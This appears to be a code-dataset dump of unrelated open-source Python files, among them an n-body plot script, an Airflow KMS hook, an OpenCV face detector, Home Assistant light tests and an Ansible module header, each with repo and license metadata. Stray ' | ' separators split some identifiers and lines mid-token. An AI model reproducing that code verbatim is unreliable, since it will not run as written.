n_it = len(data[0]) #calc num of lines
limit = 1 #size limits for plots = (x,y,z/2)
|
print 'deleting any existing .png images in output_movie folder'
call("rm output_movie/*.png",shell=True)
collision = np.zeros(N_bodies)
# Render one 3D scatter frame per timestep. A particle whose line is
# missing or unparsable is assumed to have been removed by a collision.
for iteration in xrange(0,n_it):
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    for i in xrange(0,N_bodies):
        try:
            # Columns: time, id, x, y, z.
            line = data[i][iteration].split(",")
            color = get_color(int(line[1]),N_massive)
            ax.scatter(float(line[2]),float(line[3]),float(line[4]),c=color, lw=0)
        except:
            if collision[i] == 0:
                print 'particle',i,' had a collision'
                collision[i] = 1
    #plotting details - make it all look pwetty.
    ax.set_xlim([-limit,limit])
    ax.set_ylim([-limit,limit])
    ax.set_zlim([-limit/4,limit/4])
    ax.view_init(elev = 90, azim=100) #both are in degrees. elev = 0 or 90 is what you want
    output = 't='+line[0]
    ax.set_title(output)
    ax.set_xlabel('x')
    ax.set_ylabel('y')
    ax.set_zlabel('z')
    plt.savefig('movie_output/movie_output'+str(iteration)+'.png')
    print 'completed iteration '+str(iteration + 1)+' of '+str(n_it)
|
jboeuf/grpc | tools/run_tests/python_utils/antagonist.py | Python | apache-2.0 | 688 | 0 | #!/usr/bin/env python |
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This is used by run_tests.py to create cpu load on a machine"""
# Busy-loop forever to peg one CPU core; run_tests.py terminates this
# process externally when the load is no longer needed.
while True:
    pass
|
nithyanandan/general | astroutils/__init__.py | Python | mit | 473 | 0.016913 | import os as _os
# Package metadata.
__version__='2.0.1'
__description__='General Purpose Radio Astronomy and Data Analysis Utilities'
__author__='Nithyanandan Thyagarajan'
__authoremail__='nithyanandan.t@gmail.com'
__maintainer__='Nithyanandan Thyagarajan'
__maintaineremail__='nithyanandan.t@gmail.com'
__url__='http://github.com/nithyanandan/general'

# Record the git revision the package was built from; githash.txt is
# generated at build time next to this file. NOTE: readline() keeps any
# trailing newline.
with open(_os.path.dirname(_os.path.abspath(__file__))+'/githash.txt', 'r') as _githash_file:
    __githash__ = _githash_file.readline()
|
andyxhadji/incubator-airflow | airflow/contrib/hooks/gcp_kms_hook.py | Python | apache-2.0 | 4,060 | 0.001478 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import base64
from airflow.contrib.hooks.gcp_api_base_hook import GoogleCloudBaseHook
from apiclient.discovery import build
def _b64encode(s):
""" Base 64 encodes a bytes object to a string """
return base64.b64encode(s).decode('ascii')
def _b64decode(s):
""" Base 64 decodes a string to bytes. """
return base64.b64decode(s.encode('utf-8'))
class GoogleCloudKMSHook(GoogleCloudBaseHook):
    """
    Interact with Google Cloud KMS. This hook uses the Google Cloud Platform
    connection.
    """

    def __init__(self, gcp_conn_id='google_cloud_default', delegate_to=None):
        super(GoogleCloudKMSHook, self).__init__(gcp_conn_id, delegate_to=delegate_to)

    def get_conn(self):
        """
        Returns a KMS service object.

        :rtype: apiclient.discovery.Resource
        """
        http_authorized = self._authorize()
        return build(
            'cloudkms', 'v1', http=http_authorized, cache_discovery=False)

    def encrypt(self, key_name, plaintext, authenticated_data=None):
        """
        Encrypts a plaintext message using Google Cloud KMS.

        :param key_name: The Resource Name for the key (or key version)
            to be used for encryption. Of the form
            ``projects/*/locations/*/keyRings/*/cryptoKeys/**``
        :type key_name: str
        :param plaintext: The message to be encrypted.
        :type plaintext: bytes
        :param authenticated_data: Optional additional authenticated data that
            must also be provided to decrypt the message.
        :type authenticated_data: bytes
        :return: The base 64 encoded ciphertext of the original message.
        :rtype: str
        """
        keys = self.get_conn().projects().locations().keyRings().cryptoKeys()
        # The KMS REST API expects base64-encoded payload fields.
        body = {'plaintext': _b64encode(plaintext)}
        if authenticated_data:
            body['additionalAuthenticatedData'] = _b64encode(authenticated_data)
        request = keys.encrypt(name=key_name, body=body)
        response = request.execute()
        ciphertext = response['ciphertext']
        return ciphertext

    def decrypt(self, key_name, ciphertext, authenticated_data=None):
        """
        Decrypts a ciphertext message using Google Cloud KMS.

        :param key_name: The Resource Name for the key to be used for decryption.
            Of the form ``projects/*/locations/*/keyRings/*/cryptoKeys/**``
        :type key_name: str
        :param ciphertext: The message to be decrypted.
        :type ciphertext: str
        :param authenticated_data: Any additional authenticated data that was
            provided when encrypting the message.
        :type authenticated_data: bytes
        :return: The original message.
        :rtype: bytes
        """
        keys = self.get_conn().projects().locations().keyRings().cryptoKeys()
        body = {'ciphertext': ciphertext}
        if authenticated_data:
            body['additionalAuthenticatedData'] = _b64encode(authenticated_data)
        request = keys.decrypt(name=key_name, body=body)
        response = request.execute()
        plaintext = _b64decode(response['plaintext'])
        return plaintext
|
akiokio/centralfitestoque | src/.pycharm_helpers/docutils/transforms/components.py | Python | bsd-2-clause | 2,003 | 0.000999 | # $Id: components.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Docutils component-related transforms.
"""
# Docstring markup format used throughout this module.
__docformat__ = 'reStructuredText'

import sys
import os
import re
import time

from docutils import nodes, utils
from docutils import ApplicationError, DataError
from docutils.transforms import Transform, TransformError
class Filter(Transform):
    """
    Include or exclude elements which depend on a specific Docutils component.
    For use with `nodes.pending` elements. A "pending" element's dictionary
    attribute ``details`` must contain the keys "component" and "format". The
    value of ``details['component']`` must match the type name of the
    component the elements depend on (e.g. "writer"). The value of
    ``details['format']`` is the name of a specific format or context of that
    component (e.g. "html"). If the matching Docutils component supports that
    format or context, the "pending" element is replaced by the contents of
    ``details['nodes']`` (a list of nodes); otherwise, the "pending" element
    is removed.
    For example, the reStructuredText "meta" directive creates a "pending"
    element containing a "meta" element (in ``pending.details['nodes']``).
    Only writers (``pending.details['component'] == 'writer'``) supporting the
    "html" format (``pending.details['format'] == 'html'``) will include the
    "meta" element; it will be deleted from the output of all other writers.
    """
    default_priority = 780
    def apply(self):
        pending = self.startnode
        component_type = pending.details['component'] # 'reader' or 'writer'
        format = pending.details['format']
        component = self.document.transformer.components[component_type]
        # Keep the pending nodes only if the active component supports the
        # requested format; otherwise drop them from the tree entirely.
        if component.supports(format):
            pending.replace_self(pending.details['nodes'])
        else:
            pending.parent.remove(pending)
|
RevansChen/online-judge | Codewars/7kyu/remove-anchor-from-url/Python/solution1.py | Python | mit | 102 | 0.019608 | # Python - 3.6.0
def remove_url_anchor(url):
    """Return *url* with the '#anchor' fragment (if any) removed.

    str.partition returns everything before the first '#', or the whole
    string when there is no '#'. Unlike the original index-based slice,
    this also handles a leading '#' correctly (returns '').
    """
    return url.partition('#')[0]
|
iw3hxn/LibrERP | export_customers/__openerp__.py | Python | agpl-3.0 | 2,043 | 0.000979 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2014 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
# Odoo/OpenERP module manifest: a single dict literal read by the server.
{
    "name": "Export Customers - Exporting customer's data in .csv file for italian fiscal program.",
    'version': '2.0.1.0',
    'category': 'Generic Modules/Sales customers',
    "description": """Exporting customer's data in .csv file """,
    "author": "Didotech SRL",
    'website': 'http://www.didotech.com',
    "depends": [
        "base",
        "base_partner_ref",
        "sale",
        "account",
        #"l10n_it",
        "l10n_it_base",
        "l10n_it_account"
    ],
    "init_xml": [],
    "update_xml": [
        "security/security.xml",
        "export_customers.xml"
    ],
    "demo_xml": [],
    "installable": True,
    "active": False,
}
|
joberembt/PokeAlarm | alarms/alarm.py | Python | gpl-3.0 | 1,134 | 0.054674 | #Setup Logging
import logging
log = logging.getLogger(__name__)
#Python modules
#Local modules
#External modules
class Alarm(object):
    """Abstract base class for notification services.

    Concrete subclasses (one per service) must override every method below;
    each base implementation simply raises NotImplementedError.
    """

    # Default (empty) per-category alert settings a subclass may override.
    _defaults = {
        "pokemon": {},
        "lures": {},
        "gyms": {}
    }

    # Gather settings and create alarm
    def __init__(self):
        raise NotImplementedError("This is an abstract method.")

    # (Re)establishes Service connection
    # NOTE: 'self' was missing from the original signature, so an instance
    # call (alarm.connect()) raised TypeError instead of NotImplementedError.
    def connect(self):
        raise NotImplementedError("This is an abstract method.")

    # Set the appropriate settings for each alert
    def set_alert(self, settings):
        raise NotImplementedError("This is an abstract method.")

    # Send Alert to the Service
    def send_alert(self, alert_settings, info):
        raise NotImplementedError("This is an abstract method.")

    # Trigger an alert based on Pokemon info
    def pokemon_alert(self, pokemon_info):
        raise NotImplementedError("This is an abstract method.")

    # Trigger an alert based on PokeLure info
    def pokestop_alert(self, pokelure_info):
        raise NotImplementedError("This is an abstract method.")

    # Trigger an alert based on PokeGym info
    def gym_alert(self, pokegym_info):
        raise NotImplementedError("This is an abstract method.")
|
ddemidov/ev3dev-lang-python-1 | spec_version.py | Python | mit | 108 | 0 | # ~autogen spec_ver | sion
# Autogenerated version pin (see the surrounding ``~autogen`` markers);
# do not edit by hand.
spec_version = "spec: 0.9.3-pre-r2, kernel: v3.16.7-ckt16-7-ev3dev-ev3"
# ~autogen
|
plxaye/chromium | src/build/android/pylib/gtest/test_runner.py | Python | apache-2.0 | 15,830 | 0.004296 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import logging
import os
from pylib import android_commands
from pylib import constants
from pylib import perf_tests_helper
from pylib.android_commands import errors
from pylib.base import base_test_result
from pylib.base import base_test_runner
from pylib.utils import run_tests_helper
import test_package_apk
import test_package_executable
def _GetDataFilesForTestSuite(test_suite_basename):
"""Returns a list of data files/dirs needed by the test suite.
Args:
test_suite_basename: The test suite basename for which to return file paths.
Returns:
A list of test file and directory paths.
"""
# Ideally, we'd just push all test data. However, it has >100MB, and a lot
# of the files are not relevant (some are used for browser_tests, others for
# features not supported, etc..).
if test_suite_basename == 'base_unittests':
return [
'base/test/data/',
]
elif test_suite_basename == 'unit_tests':
test_files = [
'base/test/data/',
'chrome/test/data/download-test1.lib',
'chrome/test/data/extensions/bad_magic.crx',
'chrome/test/data/extensions/good.crx',
'chrome/test/data/extensions/icon1.png',
'chrome/test/data/extensions/icon2.png',
'chrome/test/data/extensions/icon3.png',
'chrome/test/data/extensions/allow_silent_upgrade/',
'chrome/test/data/extensions/app/',
'chrome/test/data/extensions/bad/',
'chrome/test/data/extensions/effective_host_permissions/',
'chrome/test/data/extensions/empty_manifest/',
'chrome/test/data/extensions/good/Extensions/',
'chrome/test/data/extensions/manifest_tests/',
'chrome/test/data/extensions/page_action/',
'chrome/test/data/extensions/permissions/',
'chrome/test/data/extensions/script_and_capture/',
'chrome/test/data/extensions/unpacker/',
'chrome/test/data/bookmarks/',
'chrome/test/data/components/',
'chrome/test/data/extensions/json_schema_test.js',
'chrome/test/data/History/',
'chrome/test/data/json_schema_validator/',
'chrome/test/data/pref_service/',
'chrome/test/data/simple_open_search.xml',
'chrome/test/data/top_sites/',
'chrome/test/data/web_app_info/',
'chrome/test/data/web_database',
'chrome/test/data/webui/',
'chrome/third_party/mock4js/',
'net/data/ssl/certificates',
'third_party/accessibility-developer-tools/gen/axs_testing.js',
]
# The following are spell check data. Now only list the data under
# third_party/hunspell_dictionaries which are used by unit tests.
old_cwd = os.getcwd()
os.chdir(constants.CHROME_DIR)
test_files += glob.glob('third_party/hunspell_dictionaries/*.bdic')
os.chdir(old_cwd)
return test_files
elif test_suite_basename == 'components_unittests':
return [
'components/test/data/zip',
]
elif test_suite_basename == 'media_unittests':
return [
'media/test/data',
]
elif test_suite_basename == 'net_unittests':
return [
'chrome/test/data/animate1.gif',
'chrome/test/data/simple.html',
'net/data/cache_tests',
'net/data/filter_unittests',
'net/data/ftp',
'net/data/proxy_resolver_v8_tracing_unittest',
'net/data/proxy_resolver_v8_unittest',
'net/data/proxy_script_fetcher_unittest',
'net/data/ssl/certificates',
'net/data/url_request_unittest/',
]
elif test_suite_basename == 'ui_tests':
return [
'chrome/test/data/dromaeo',
'chrome/test/data/json2.js',
'chrome/test/data/sunspider',
]
elif test_suite_basename == 'ui_unittests':
return [
'ui/base/test/data/data_pack_unittest/truncated-header.pak',
]
elif test_suite_basename == 'content_unittests':
return [
'content/browser/gpu/software_rendering_list.json',
'content/test/data/gpu/webgl_conformance_test_expectations.txt',
'net/data/ssl/certificates/',
'third_party/hyphen/hyph_en_US.dic',
'webkit/data/dom_storage/webcore_test_database.localstorage',
]
elif test_suite_basename == 'cc_perftests':
return [
'cc/test/data',
]
elif test_suite_basename == 'perf_tests':
return [
'base/test/data',
]
elif test_suite_basename == 'content_browsertests':
return [
'content/test/data/content-disposition-inline.html',
'content/test/data/title1.html',
'content/test/data/post_message2.html',
'content/test/data/content-sniffer-test0.html.mock-http-headers',
'content/test/data/content-sniffer-test1.html.mock-http-headers',
'content/test/data/speech',
'content/test/data/page404.html.mock-http-headers',
'content/test/data/content-sniffer-test3.html',
'content/test/data/post_message.html',
'content/test/data/remove_frame_on_unload.html',
'content/test/data/cross-origin-redirect-blocked.html',
'content/test/data/prerender',
'content/test/data/device_orientation',
'content/test/data/content-disposition-empty.html',
'content/test/data/workers',
'content/test/data/content-sniffer-test3.html.mock-http-headers',
'content/test/data/content-sniffer-test0.html',
'content/test/data/browser_plugin_title_change.html',
'content/test/data/android',
'content/test/data/page404.html',
'content/test/data/dynamic2.html',
'content/test/data/browser_plugin_embedder.html',
'content/test/data/indexeddb',
'content/test/data/content-disposition-inline.html.mock-http-headers',
'content/test/data/nosniff-test.html',
'content/test/data/title3.html',
'content/test/data/browser_plugin_post_message_guest.html',
'content/test/data/content-disposition-empty.html.mock-http-headers',
'content/test/data/session_history',
'content/test/data/browser_plugin_naming_guest.html',
'content/test/data/overscroll_navigation.html',
'content/test/data/simple_database.html',
'content/test/data/gtk_key_bindings_test_gtkrc',
'content/test/data/browser_plugin_embedder_guest_unresponsive.html',
'content/test/data/sync_xmlhttprequest.html',
'content/test/data/content-sniffer-test3-frame.txt.mock-http-headers',
'content/test/data/frame_tree',
'content/test/data/browser_plugin_naming_embedder.html',
'content/test/data/content-sniffer-test2.html.mock-http-headers',
'content/test/data/sync_xmlhttprequest_disallowed.html',
'content/test/data/rwh_simple.html',
'content/test/data/title2.html',
'content/test/data/webkit',
'content/test/data/content-sniffer-test1.html',
'content/test/data/download',
'content/test/data/rwhv_compositing_static.html',
'content/test/data/content-sniffer-test2.html',
'content/test/data/simple_page.html',
'content/test/data/google.mht',
'content/test/data/site_per_process_main.html',
'content/test/data/gpu',
'content/test/data/onunload_cookie.html',
'content/test/data/textinput',
'content/test/data/navigate_opener.html',
'content/test/data/dom_storage',
| 'content/test/data/sync_xmlhttprequest_during_unload.html',
'content/test/data/browser_plugin_dragging.html',
'content/test/data/fileapi',
'content/test/data/npapi',
'content/test/data/nosniff-test.html.mock-http-headers',
'content/test/data/accessibility',
'content/test/data/dynamic1.html',
'content/test/data/browser_plugin_focus_chi | ld.html',
'content/test/data/rwhv_compositing_animation.html',
'content/test/data/click-noreferrer-links.html',
'content/test/data/browser_plugin_focus.html',
'content/test/data/media',
]
return []
def _GetOpt |
# Package author tag for pycomm.ab_comm.
__author__ = 'agostino'
# logging is imported at package scope so submodules share one namespace.
import logging
|
idf/FaceReader | facerec_py/facedet/detector.py | Python | mit | 5,760 | 0.003125 | import sys
import os
import cv2
import numpy as np
class Detector:
    """Abstract interface: every detector must expose detect(src)."""
    def detect(self, src):
        raise NotImplementedError("Every Detector must implement the detect method.")
class SkinDetector(Detector):
    """
    Implements common color thresholding rules for the RGB, YCrCb and HSV color
    space. The values are taken from a paper, which I can't find right now, so
    be careful with this detector.
    """

    def _R1(self, BGR):
        # Channel planes (OpenCV-style ordering: B, G, R).
        blue = BGR[:, :, 0]
        green = BGR[:, :, 1]
        red = BGR[:, :, 2]
        spread = (np.maximum(red, np.maximum(green, blue)) -
                  np.minimum(red, np.minimum(green, blue)))
        rule_a = ((red > 95) & (green > 40) & (blue > 20) &
                  (spread > 15) & (np.abs(red - green) > 15) &
                  (red > green) & (red > blue))
        rule_b = ((red > 220) & (green > 210) & (blue > 170) &
                  (abs(red - green) <= 15) & (red > blue) & (green > blue))
        return (rule_a | rule_b)

    def _R2(self, YCrCb):
        cr = YCrCb[:, :, 1]
        cb = YCrCb[:, :, 2]
        # Five half-plane constraints on the Cr/Cb plane (same thresholds as
        # the paper referenced in the class docstring).
        return ((cr <= (1.5862 * cb + 20)) &
                (cr >= (0.3448 * cb + 76.2069)) &
                (cr >= (-4.5652 * cb + 234.5652)) &
                (cr <= (-1.15 * cb + 301.75)) &
                (cr <= (-2.2857 * cb + 432.85)))

    def _R3(self, HSV):
        hue = HSV[:, :, 0]
        # Threshold on hue only; the other channels are ignored.
        return ((hue < 25) | (hue > 230))

    def detect(self, src):
        # Non-color or non-uint8 input: report every pixel as skin.
        if np.ndim(src) < 3:
            return np.ones(src.shape, dtype=np.uint8)
        if src.dtype != np.uint8:
            return np.ones(src.shape, dtype=np.uint8)
        converted_ycrcb = cv2.cvtColor(src, cv2.COLOR_BGR2YCR_CB)
        converted_hsv = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)
        mask = self._R1(src) & self._R2(converted_ycrcb) & self._R3(converted_hsv)
        return np.asarray(mask, dtype=np.uint8)
class CascadedDetector(Detector):
    """
    Uses the OpenCV cascades to perform the detection. Returns the Regions of Interest, where
    the detector assumes a face. You probably have to play around with the scaleFactor,
    minNeighbors and minSize parameters to get good results for your use case. From my
    personal experience, all I can say is: there's no parameter combination which *just
    works*.
    """

    def __init__(self, cascade_fn="./cascades/haarcascade_frontalface_alt2.xml", scaleFactor=1.2, minNeighbors=5,
                 minSize=(30, 30)):
        if not os.path.exists(cascade_fn):
            raise IOError("No valid cascade found for path=%s." % cascade_fn)
        self.cascade = cv2.CascadeClassifier(cascade_fn)
        self.scaleFactor = scaleFactor
        self.minNeighbors = minNeighbors
        self.minSize = minSize

    def detect(self, src):
        # Run the cascade on an equalized grayscale copy of the input.
        gray = src
        if np.ndim(gray) == 3:
            gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
        gray = cv2.equalizeHist(gray)
        hits = self.cascade.detectMultiScale(
            gray, scaleFactor=self.scaleFactor,
            minNeighbors=self.minNeighbors, minSize=self.minSize)
        if len(hits) == 0:
            return []
        # Convert (x, y, w, h) boxes into (x0, y0, x1, y1) corner boxes.
        hits[:, 2:] += hits[:, :2]
        return hits
class SkinFaceDetector(Detector):
    """
    Uses the SkinDetector to accept only faces over a given skin color tone threshold (ignored for
    grayscale images). Be careful with skin color tone thresholding, as it won't work in uncontrolled
    scenarios (without preprocessing)!
    """

    def __init__(self, threshold=0.3, cascade_fn="./cascades/haarcascade_frontalface_alt2.xml", scaleFactor=1.2,
                 minNeighbors=5, minSize=(30, 30)):
        self.faceDetector = CascadedDetector(cascade_fn=cascade_fn, scaleFactor=scaleFactor, minNeighbors=minNeighbors,
                                             minSize=minSize)
        self.skinDetector = SkinDetector()
        self.threshold = threshold

    def detect(self, src):
        """Return only the face rectangles whose skin-pixel ratio exceeds the threshold."""
        rects = []
        # Fix: dropped the unused enumerate() index variable.
        for r in self.faceDetector.detect(src):
            x0, y0, x1, y1 = r
            face = src[y0:y1, x0:x1]
            skinPixels = self.skinDetector.detect(face)
            skinPercentage = float(np.sum(skinPixels)) / skinPixels.size
            # Fix: parenthesized form works on both Python 2 and Python 3
            # (the original used a py2-only print statement).
            print(skinPercentage)
            if skinPercentage > self.threshold:
                rects.append(r)
        return rects
if __name__ == "__main__":
    # script parameters: detector.py <input image> [<output image>]
    if len(sys.argv) < 2:
        raise Exception("No image given.")
    inFileName = sys.argv[1]
    outFileName = None
    if len(sys.argv) > 2:
        outFileName = sys.argv[2]
    if outFileName == inFileName:
        # Never overwrite the input image; fall back to on-screen display.
        outFileName = None
    # detection begins here
    img = np.array(cv2.imread(inFileName), dtype=np.uint8)
    imgOut = img.copy()
    # set up detectors
    # detector = SkinFaceDetector(threshold=0.3, cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_frontalface_alt2.xml")
    detector = CascadedDetector(
        cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_frontalface_alt2.xml")
    eyesDetector = CascadedDetector(scaleFactor=1.1, minNeighbors=5, minSize=(20, 20),
                                    cascade_fn="/home/philipp/projects/opencv2/OpenCV-2.3.1/data/haarcascades/haarcascade_eye.xml")
    # detection: draw face boxes, then eye boxes inside each face region
    for i, r in enumerate(detector.detect(img)):
        x0, y0, x1, y1 = r
        cv2.rectangle(imgOut, (x0, y0), (x1, y1), (0, 255, 0), 1)
        face = img[y0:y1, x0:x1]
        for j, r2 in enumerate(eyesDetector.detect(face)):
            ex0, ey0, ex1, ey1 = r2
            cv2.rectangle(imgOut, (x0 + ex0, y0 + ey0), (x0 + ex1, y0 + ey1), (0, 255, 0), 1)
    # display image or write to file
    if outFileName is None:
        cv2.imshow('faces', imgOut)
        cv2.waitKey(0)
    else:
        # Fix: imwrite previously ran unconditionally, crashing with a None
        # filename whenever the result was shown on screen instead of saved.
        cv2.imwrite(outFileName, imgOut)
leppa/home-assistant | tests/components/rfxtrx/test_light.py | Python | apache-2.0 | 12,456 | 0.000723 | """The tests for the Rfxtrx light platform."""
import unittest
import RFXtrx as rfxtrxmod
import pytest
from homeassistant.components import rfxtrx as rfxtrx_core
from homeassistant.setup import setup_component
from tests.common import get_test_home_assistant, mock_component
@pytest.mark.skipif("os.environ.get('RFXTRX') != 'RUN'")
class TestLightRfxtrx(unittest.TestCase):
"""Test the Rfxtrx light platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, "rfxtrx")
def tearDown(self):
"""Stop everything that was started."""
rfxtrx_core.RECEIVED_EVT_SUBSCRIBERS = []
rfxtrx_core.RFX_DEVICES = {}
if rfxtrx_core.RFXOBJECT:
rfxtrx_core.RFXOBJECT.close_connection()
self.hass.stop()
    def test_valid_config(self):
        """Test configuration."""
        # New-style config: the device key is the full packet id.
        assert setup_component(
            self.hass,
            "light",
            {
                "light": {
                    "platform": "rfxtrx",
                    "automatic_add": True,
                    "devices": {
                        "0b1100cd0213c7f210010f51": {
                            "name": "Test",
                            rfxtrx_core.ATTR_FIREEVENT: True,
                        }
                    },
                }
            },
        )
        # Old-style config: short device id plus an explicit packetid.
        assert setup_component(
            self.hass,
            "light",
            {
                "light": {
                    "platform": "rfxtrx",
                    "automatic_add": True,
                    "devices": {
                        "213c7f216": {
                            "name": "Test",
                            "packetid": "0b1100cd0213c7f210010f51",
                            "signal_repetitions": 3,
                        }
                    },
                }
            },
        )
    def test_invalid_config(self):
        """Test configuration."""
        # An unknown key ("invalid_key") must make component setup fail.
        assert not setup_component(
            self.hass,
            "light",
            {
                "light": {
                    "platform": "rfxtrx",
                    "automatic_add": True,
                    "invalid_key": "afda",
                    "devices": {
                        "213c7f216": {
                            "name": "Test",
                            "packetid": "0b1100cd0213c7f210010f51",
                            rfxtrx_core.ATTR_FIREEVENT: True,
                        }
                    },
                }
            },
        )
def test_default_config(self):
"""Test with 0 switches."""
assert setup_component(
self.hass, "light", {"light": {"platform": "rfxtrx", "devices": {}}}
)
assert 0 == len(rfxtrx_core.RFX_DEVICES)
def test_old_config(self):
"""Test with 1 light."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"devices": {
"123efab1": {
"name": "Test",
"packetid": "0b1100cd0213c7f210010f51",
}
},
}
},
)
rfxtrx_core.RFXOBJECT = rfxtrxmod.Core(
"", transport_protocol=rfxtrxmod.DummyTransport
)
assert 1 == len(rfxtrx_core.RFX_DEVICES)
entity = rfxtrx_core.RFX_DEVICES["213c7f216"]
assert "Test" == entity.name
assert "off" == entity.state
assert entity.assumed_state
assert entity.signal_repetitions == 1
assert not entity.should_fire_event
assert not entity.should_poll
assert not entity.is_on
entity.turn_on()
assert entity.is_on
assert entity.brightness == 255
entity.turn_off()
assert not entity.is_on
assert entity.brightness == 0
entity.turn_on(brightness=100)
assert entity.is_on
assert entity.brightness == 100
entity.turn_on(brightness=10)
assert entity.is_on
assert entity.brightness == 10
entity.turn_on(brightness=255)
assert entity.is_on
assert entity.brightness == 255
def test_one_light(self):
"""Test with 1 light."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"devices": {"0b1100cd0213c7f210010f51": {"name": "Test"}},
}
},
)
import RFXtrx as rfxtrxmod
rfxtrx_core.RFXOBJECT = rfxtrxmod.Core(
"", transport_protocol=rfxtrxmod.DummyTransport
)
assert 1 == len(rfxtrx_core.RFX_DEVICES)
entity = rfxtrx_core.RFX_DEVICES["213c7f216"]
assert "Test" == entity.name
assert "off" == entity.state
assert entity.assumed_state
assert entity.signal_repetitions == 1
assert not entity.should_fire_event
assert not entity.should_poll
assert not entity.is_on
entity.turn_on()
assert entity.is_on
assert entity.brightness == 255
entity.turn_off()
assert not entity.is_on
assert entity.brightness == 0
entity.turn_on(brightness=100)
assert entity.is_on
assert entity.brightness == 100
entity.turn_on(brightness=10)
assert entity.is_on
assert entity.brightness == 10
entity.turn_on(brightness=255)
assert entity.is_on
| assert entity.brightness == 255
entity.turn_off()
entity_id = rfxtrx_core.RFX_DEVICES["213c7f216"].entity_id
entity_hass = self. | hass.states.get(entity_id)
assert "Test" == entity_hass.name
assert "off" == entity_hass.state
entity.turn_on()
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_off()
entity_hass = self.hass.states.get(entity_id)
assert "off" == entity_hass.state
entity.turn_on(brightness=100)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_on(brightness=10)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
entity.turn_on(brightness=255)
entity_hass = self.hass.states.get(entity_id)
assert "on" == entity_hass.state
def test_several_lights(self):
"""Test with 3 lights."""
assert setup_component(
self.hass,
"light",
{
"light": {
"platform": "rfxtrx",
"signal_repetitions": 3,
"devices": {
"0b1100cd0213c7f230010f71": {"name": "Test"},
"0b1100100118cdea02010f70": {"name": "Bath"},
"0b1100101118cdea02010f70": {"name": "Living"},
},
}
},
)
assert 3 == len(rfxtrx_core.RFX_DEVICES)
device_num = 0
for id in rfxtrx_core.RFX_DEVICES:
entity = rfxtrx_core.RFX_DEVICES[id]
assert entity.signal_repetitions == 3
if entity.name == "Living":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Living: off>" == entity.__str__()
elif entity.name == "Bath":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Bath: off>" == entity.__str__()
elif entity.name == "Test":
device_num = device_num + 1
assert "off" == entity.state
assert "<Entity Test: off>" == entity.__str__()
assert 3 == device_num
def test_discover_light(self):
"""Test with discovery of lights."""
assert setup_component(
self.hass,
|
Tatsh-ansible/ansible | lib/ansible/modules/cloud/openstack/os_server_facts.py | Python | gpl-3.0 | 3,271 | 0.001529 | #!/usr/bin/python
# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
# Ansible module metadata consumed by the documentation/build tooling.
ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
module: os_server_facts
short_description: Retrieve facts about one or more compute instances
author: Monty
version_added: "2.0"
description:
    - Retrieve facts about server instances from OpenStack.
notes:
    - This module creates a new top-level C(openstack_servers) fact, which
      contains a list of servers.
requirements:
    - "python >= 2.6"
    - "shade"
options:
   server:
     description:
       - restrict results to servers with names or UUID matching
         this glob expression (e.g., C<web*>).
     required: false
     default: None
   detailed:
     description:
        - when true, return additional detail about servers at the expense
          of additional API calls.
     required: false
